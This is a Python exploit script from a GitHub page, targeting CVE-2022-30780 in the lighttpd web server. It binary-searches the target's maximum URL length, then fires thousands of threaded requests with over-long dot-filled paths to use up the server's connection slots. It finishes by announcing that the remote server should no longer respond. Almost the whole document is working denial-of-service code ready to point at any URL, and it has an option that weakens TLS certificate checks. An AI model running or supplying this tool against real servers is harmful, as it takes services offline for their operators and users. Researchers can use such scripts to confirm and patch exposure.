-
-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathCVE-2022-30780-lighttpd-denial-of-service.py
executable file
·180 lines (156 loc) · 6.92 KB
/
CVE-2022-30780-lighttpd-denial-of-service.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name : CVE-2022-30780-lighttpd-denial-of-service.py
# Author : Podalirius (@podalirius_)
# Date created : 17 July 2021
import argparse
import requests
import time
from concurrent.futures import ThreadPoolExecutor
from enum import Enum
class RequestStatus(Enum):
OK = 0
HTTP_200 = 200
HTTP_403 = 403
HTTP_404 = 404
HTTP_500 = 500
ReadTimeout = 1001
ConnectTimeout = 1002
ConnectionError = 1003
def test(baseurl, lenght, timeout=1):
try:
length = lenght - (len(baseurl) + 2)
testurl = baseurl + '/' + "."*length + "/"
r = requests.get(testurl, timeout=timeout)
except requests.exceptions.ReadTimeout as e:
return RequestStatus.ReadTimeout
except requests.exceptions.ConnectTimeout as e:
return RequestStatus.ConnectTimeout
except requests.exceptions.ConnectionError as e:
return RequestStatus.ConnectionError
return RequestStatus.OK
def dichotomic_search(url, timeout=1, verbose=False):
print("[>] Performing dichotomic search to find maximum URL length ...")
urllen, step = 1000, 1000
normal_response = test(url, len(url), timeout=timeout)
last_result = normal_response
if last_result == normal_response:
while step >= 1 and 0 < urllen <= 150000:
result = test(url, urllen, timeout=timeout)
if verbose:
print(" [>] Testing URL length %d, (%s => %s)" % (urllen, result.name, last_result.name))
if last_result == RequestStatus.OK:
if result == RequestStatus.OK:
urllen = urllen + step
else:
# Too long
step = step//2
urllen = urllen - step
else:
if result == normal_response:
step = step//2
urllen = urllen + step
else:
# Too long
urllen = urllen - step
last_result = result
if urllen <= 0 or urllen >= 150000:
print("[!] Could not determine maximum URL length.")
print("[!] Maybe we can't connect to this URL or this lighttpd is not vulnerable?")
return None
else:
print("[+] Found maximum URL length %d" % urllen)
return urllen
else:
print("[!] Could connect to this URL. (%s)" % last_result)
return None
def worker(baseurl, max_url_len, monitor_data):
try:
length = (max_url_len + 1) - (len(baseurl) + 2)
testurl = baseurl + '/' + "."*length + "/"
monitor_data["sent"] = monitor_data["sent"] + 1
r = requests.get(testurl, timeout=1)
except requests.exceptions.ReadTimeout as e:
monitor_data["ReadTimeout"] = monitor_data["ReadTimeout"] + 1
return "ReadTimeout"
except requests.exceptions.ConnectTimeout as e:
monitor_data["ConnectTimeout"] = monitor_data["ConnectTimeout"] + 1
return "ConnectTimeout"
return None
def monitor_thread(monitor_data):
refresh_rate = 0.5
dos_count = 0
mon_last, mon_now = monitor_data.copy(), monitor_data.copy()
while monitor_data["sent"] < monitor_data["total"] and dos_count <= 3:
mon_now = monitor_data.copy()
diff_ct = (mon_now["ConnectTimeout"] - mon_last["ConnectTimeout"])
diff_rt = (mon_now["ReadTimeout"] - mon_last["ReadTimeout"])
if (diff_ct > 0) and (diff_rt == 0):
# sockets disabled, connection limit reached
dos_count += 1
print("[monitoring] (%04d/%04d) %5.2f %% | Rate %3d req/s | ConnectTimeout:%04d | ReadTimeout:%04d (sockets disabled, connection limit reached) " % (
mon_now["sent"],
mon_now["total"],
(mon_now["sent"] / mon_now["total"]) * 100,
(mon_now["sent"] - mon_last["sent"]) * refresh_rate,
mon_now["ConnectTimeout"],
mon_now["ReadTimeout"])
)
else:
dos_count = 0
print("[monitoring] (%04d/%04d) %5.2f %% | Rate %3d req/s | ConnectTimeout:%04d | ReadTimeout:%04d " % (
mon_now["sent"],
mon_now["total"],
(mon_now["sent"] / mon_now["total"]) * 100,
(mon_now["sent"] - mon_last["sent"]) * refresh_rate,
mon_now["ConnectTimeout"],
mon_now["ReadTimeout"])
)
mon_last = mon_now
time.sleep(refresh_rate)
print()
# If DoS, terminate all threads.
if dos_count > 3:
for t in monitor_data["tasks"]:
t.cancel()
def parseArgs():
parser = argparse.ArgumentParser(description="CVE-2022-30780-lighttpd-denial-of-service")
parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose mode")
parser.add_argument("-u", "--url", dest="url", action="store", type=str, required=True, help="URL to connect to.")
parser.add_argument("-k", "--insecure", dest="insecure_tls", action="store_true", default=False, help="Allow insecure server connections when using SSL (default: False)")
parser.add_argument("-t", "--threads", dest="threads", action="store", type=int, default=256, required=False, help="Number of threads (default: 20)")
return parser.parse_args()
if __name__ == '__main__':
options = parseArgs()
# https://redmine.lighttpd.net/issues/3059
server_max_fds = 8192
server_max_connections = 8192
if not options.url.startswith("http://") and not options.url.startswith("https://"):
options.url = "https://" + options.url
options.url = options.url.rstrip('/')
if options.insecure_tls:
# Disable warings of insecure connection for invalid certificates
requests.packages.urllib3.disable_warnings()
# Allow use of deprecated and weak cipher methods
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
try:
requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
except AttributeError:
pass
# Detecting maximum URL length
max_url_len = dichotomic_search(options.url, timeout=1, verbose=options.verbose)
if max_url_len is not None:
monitor_data = {
"total": server_max_connections,
"sent": 0,
"ReadTimeout": 0,
"ConnectTimeout": 0,
"tasks": []
}
# Waits for all the threads to be completed
with ThreadPoolExecutor(max_workers=min(options.threads, server_max_connections)) as tp:
tp.submit(monitor_thread, monitor_data)
for k in range(server_max_connections):
t = tp.submit(worker, options.url, max_url_len, monitor_data)
monitor_data["tasks"].append(t)
print("[>] All done! Remote server at %s should not be responding anymore." % options.url)